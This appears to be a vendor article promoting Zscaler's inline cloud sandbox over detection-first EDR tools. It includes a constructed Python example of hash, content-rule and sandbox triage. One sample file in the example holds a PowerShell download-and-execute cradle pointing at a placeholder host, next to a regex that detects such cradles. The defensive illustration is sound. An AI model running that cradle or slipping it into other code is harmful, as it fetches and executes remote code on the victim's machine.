Why Your Detection-First Security Approach Isn't Working
Stopping new and evasive threats is one of the biggest challenges in cybersecurity. It is also one of the main reasons attacks increased dramatically again over the past year, despite an estimated $172 billion in global cybersecurity spending in 2022.
Armed with cloud-based tools and backed by a sophisticated network of affiliates, threat actors can develop new and evasive malware faster than organizations can update their protections.
Relying on malware signatures and block lists against such rapidly changing attacks is futile. As a result, SOC toolkits now largely revolve around threat detection and investigation: if an attacker gets past your initial block, you expect a tool to pick them up somewhere later in the attack chain. Every organization's architecture is now layered with security controls that log anything potentially harmful, and security analysts comb through those logs to decide what to investigate further.
Does it work? Let’s look at the numbers:
- 76% of security teams said they were unable to achieve their goals due to a shortage of staff
- 56% of attacks took months—or longer—to be discovered
- Attacks are on the rise: global cybercrime losses are expected to reach $10.5 trillion by 2025
Obviously, something needs to change. Detection technology serves an important purpose, and investing in it is not wrong, but it must not be overemphasized.
Organizations need to return to prioritizing threat prevention first and foremost. That advice comes from a leader in zero trust, a model that essentially assumes your preventive controls have failed and that you are being actively breached at any given time.
The endpoint is just the starting point
While many security categories expose the gaps in detection-first security strategies, let's look at one popular category in particular: endpoint detection and response (EDR).
EDR adoption has grown rapidly: already a $2 billion industry, it is growing at a CAGR of 25.3%. That makes sense. Most attacks start from an endpoint, and if you detect them early in the attack chain, you minimize their impact. A good EDR solution also provides rich endpoint telemetry to help with investigation, compliance, and finding and remediating vulnerabilities.
Endpoint security is an area worth investing in, and an important component of zero trust, but it is not the whole picture. Despite vendor claims of "extended" detection and response that unifies data across the enterprise, XDR solutions do not provide defense in depth on their own. EDR includes antivirus to stop known malware, but it usually lets all other traffic pass through, relying on analytics to eventually detect what the AV missed.
All tools have drawbacks, and EDR is no exception, because:
Not all attacks start from an endpoint. The internet is the new network, and most organizations have data and applications spread across multiple clouds. They also commonly run devices such as VPN concentrators and firewalls that are reachable from the internet, and anything exposed is subject to attack. Zscaler ThreatLabz found that 30% of SSL-based attacks hide in cloud-based file sharing services like AWS, Google Drive, OneDrive, and Dropbox.
Not all endpoints are managed. EDR relies on an agent being installed on every IT-managed device, but it does not account for the many scenarios in which unmanaged endpoints touch your data or network: IoT and OT devices, personal (BYOD) endpoints used for work, third-party partners and contractors with access to data, recently merged or acquired companies, even guests who come to your office and use the Wi-Fi.
EDR can be bypassed. All security tools have drawbacks, and EDR has proven easy enough to evade with some common techniques, such as invoking system calls directly to sidestep the user-mode hooks an agent relies on. Attackers also use encryption and obfuscation to automatically generate new PDFs, Microsoft 365 documents, and other files whose malware fingerprints change each time, so they slip past traditional signature-based controls undetected.
Modern threats move very fast. Today's ransomware strains, almost all of them available for purchase on the dark web by any would-be cybercriminal, can encrypt data too quickly for detection-based technologies to be useful. LockBit v3.0 can encrypt 25,000 files in a minute, and it is not even the fastest ransomware out there. By contrast, the average time to detect and contain a breach is measured at 280 days. That is enough time for LockBit to encrypt more than 10 billion files.
Get your security inline
It is true that signature-based antivirus technology is no longer sufficient to stop sophisticated attacks. But it is also true that the same AI-powered analytics behind detection technology can (and should!) be used for prevention, not just detection, when delivered inline. A prevention strategy needs to cover your entire infrastructure, not just your endpoints or any other single part of your architecture.
The sandbox is a prime example of a security tool that can be used this way. A sandbox provides real-time protection against sophisticated and unknown threats by detonating suspicious files and URLs in a secure, isolated environment. Deploying it inline (rather than as a passthrough, out-of-band copy of the traffic) means a file is not allowed to proceed to its destination until the sandbox renders a verdict.
The Zscaler Zero Trust Exchange platform includes a cloud-native proxy that inspects all traffic, encrypted or not, to enable secure access. Because it is a proxy, the controls layered on the platform, including an integrated sandbox, are all delivered inline with a prevention-first approach.
Complementing your detection technology with Zscaler's inline, cloud-native sandbox gives you:
AI-powered real-time protection against zero-day threats
Zscaler uses advanced machine learning models, continuously refined by the world's largest security cloud, which processes more than 300 billion transactions per day. These models analyze suspicious files and URLs in real time, detecting and blocking potential threats before they can cause damage.
It starts with a pre-filter analysis that checks file contents against 40+ threat feeds, antivirus signatures, hash block lists, and YARA rules for known indicators of compromise (IOCs). Reducing the number of files that require deeper analysis lets the AI/ML models work more effectively. When a file remains unknown or suspicious after initial triage, the Zscaler Sandbox detonates it and performs static, dynamic, and secondary analyses, including secondary payload and code analysis that detects advanced evasion techniques. Once complete, a report is generated with a threat score and an actionable verdict, and malicious and suspicious files are blocked according to policy configuration.
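The two ideas above, an inline gate that holds a file until a verdict exists (as opposed to a passthrough that delivers first and alerts later) and tiered triage (hash block list and YARA-style content rules first, deeper analysis only for what remains unknown, a policy table deciding the action per verdict), are sketched below as an added example. This is illustrative code written for this page, not Zscaler's sandbox or proxy; the sample files, the "known bad" hash, the download-cradle rule and the `sandbox_verdict` field (a stand-in for what real static/dynamic analysis would return) are all constructed. The EICAR string is the standard harmless antivirus test string.

```python
"""Inline vs. passthrough file gating with tiered triage.

Constructed example: hash blocklist -> content rules (YARA-style) -> sandbox stand-in,
with a policy table deciding what happens to each verdict.  Not vendor code.
"""
import hashlib
import re
from dataclasses import dataclass
from enum import Enum
from typing import Dict, List, Optional, Tuple


class Verdict(Enum):
    BENIGN = "benign"
    SUSPICIOUS = "suspicious"
    MALICIOUS = "malicious"


@dataclass
class Sample:
    name: str
    content: bytes
    # Stand-in for the result a real sandbox would produce for this file (constructed).
    sandbox_verdict: Verdict = Verdict.BENIGN


@dataclass
class GateResult:
    action: str                     # "allow" or "block"
    verdict: Verdict
    reason: str
    delivered_before_verdict: bool  # True: the file reached its destination first


# Tier 1a: hash block list (constructed: the hash of a made-up "previously seen" sample).
KNOWN_BAD_SHA256 = {hashlib.sha256(b"previously seen dropper bytes").hexdigest()}

# Tier 1b: content rules in the spirit of YARA, written as regexes.  The first matches the
# standard EICAR test string; the second is a constructed PowerShell download-cradle pattern.
CONTENT_RULES: Dict[str, re.Pattern] = {
    "eicar_test_string": re.compile(re.escape(b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR")),
    "ps_download_cradle": re.compile(rb"powershell.{0,80}DownloadString", re.IGNORECASE),
}

# Policy: prevention-first default, so "suspicious" is blocked rather than merely logged.
POLICY = {Verdict.BENIGN: "allow", Verdict.SUSPICIOUS: "block", Verdict.MALICIOUS: "block"}


def prefilter(sample: Sample) -> Optional[Tuple[Verdict, str]]:
    """Cheap known-IOC checks; None means the file is unknown and needs deeper analysis."""
    digest = hashlib.sha256(sample.content).hexdigest()
    if digest in KNOWN_BAD_SHA256:
        return Verdict.MALICIOUS, "hash blocklist"
    for rule, pattern in CONTENT_RULES.items():
        if pattern.search(sample.content):
            return Verdict.MALICIOUS, f"content rule {rule}"
    return None


def detonate(sample: Sample) -> Tuple[Verdict, str]:
    """Stand-in for static/dynamic sandbox analysis of an unknown file."""
    return sample.sandbox_verdict, "sandbox analysis"


def inline_gate(sample: Sample) -> GateResult:
    """Inline: the file is held until a verdict exists, then policy decides delivery."""
    verdict, reason = prefilter(sample) or detonate(sample)
    return GateResult(POLICY[verdict], verdict, reason, delivered_before_verdict=False)


def passthrough_gate(sample: Sample) -> GateResult:
    """Passthrough: the AV tier still blocks known-bad files, but anything unknown is
    delivered immediately and the sandbox verdict arrives later as an alert."""
    hit = prefilter(sample)
    if hit:
        verdict, reason = hit
        return GateResult(POLICY[verdict], verdict, reason, delivered_before_verdict=False)
    verdict, reason = detonate(sample)
    return GateResult("allow", verdict, reason + " (post-delivery alert)",
                      delivered_before_verdict=True)


# Constructed sample files; sandbox_verdict is what the stand-in sandbox "would" find.
SAMPLES: List[Sample] = [
    Sample("invoice.pdf", b"%PDF-1.4 ordinary invoice text"),
    Sample("old_dropper.bin", b"previously seen dropper bytes"),
    Sample("eicar.com", b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"),
    Sample("macro.docm", b"PK vbaProject powershell -nop -c IEX((New-Object Net.WebClient)"
                         b".DownloadString('http://example.invalid/x'))"),
    Sample("new_dropper.exe", b"MZ unknown packed payload", sandbox_verdict=Verdict.MALICIOUS),
    Sample("admin_tool.zip", b"PK dual-use remote admin tool", sandbox_verdict=Verdict.SUSPICIOUS),
]


def reached_destination_before_verdict(samples: List[Sample], gate) -> List[str]:
    """Names of non-benign files that landed on the endpoint before anyone had a verdict."""
    results = [(s.name, gate(s)) for s in samples]
    return [name for name, r in results
            if r.delivered_before_verdict and r.verdict is not Verdict.BENIGN]


if __name__ == "__main__":
    for gate in (inline_gate, passthrough_gate):
        print(f"== {gate.__name__} ==")
        for s in SAMPLES:
            r = gate(s)
            print(f"{s.name:18} {r.action:5} {r.verdict.value:10} via {r.reason}")
        print("bad files delivered before verdict:",
              reached_destination_before_verdict(SAMPLES, gate))
```

Running the script shows the difference the page is arguing about: both gates block the three files the pre-filter recognizes, but only the inline gate stops the new dropper and the suspicious archive, because the passthrough gate has already released them by the time the sandbox verdict exists. Swapping `Verdict.SUSPICIOUS` to `"allow"` in `POLICY` is the kind of policy relaxation that turns a prevention control back into a detection one.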
One of the cloud’s biggest selling points is the ability to quickly scale up or down to meet the needs of organizations of all sizes. Security controls deployed in the cloud are naturally easier to provision and manage, giving your organization the flexibility to adapt to changing security needs.
Cost is one of the key inputs that determine many security strategies, and it comes in many forms: user productivity, operational efficiency, hardware costs, and so on. But the biggest line item by far is the cost of a breach. By preventing attacks, you avoid downtime, reputational damage, lost business, and remediation costs, all of which can easily add up to seven figures for a single attack. ESG found that the average organization using Zero Trust Exchange experienced a 65% reduction in malware, an 85% reduction in ransomware, and a 27% reduction in data breaches, contributing to an overall ROI of 139%.
Comprehensive threat protection
Zero Trust Exchange provides comprehensive threat prevention, detection, and analysis capabilities, giving organizations a uniform security control strategy across all locations, users, and devices. The Zscaler Sandbox can analyze files from anywhere, not just the endpoint, and integrates with additional capabilities such as DNS security, browser isolation (for fileless attacks), data loss prevention, application and workload security, deception, and many others. It gives you a complete picture of your organization's security posture and the defense in depth that security teams strive for.
Prevention comes first
In the arms race against attackers, security teams need to prioritize inline security controls over passthrough detection technologies. A file should never be allowed onto an endpoint or network unless you are sure it is benign, because if it turns out to be malicious, you likely will not know until after the damage has been done.
If you want to learn more about the Zscaler Zero Trust Exchange, visit zscaler.com.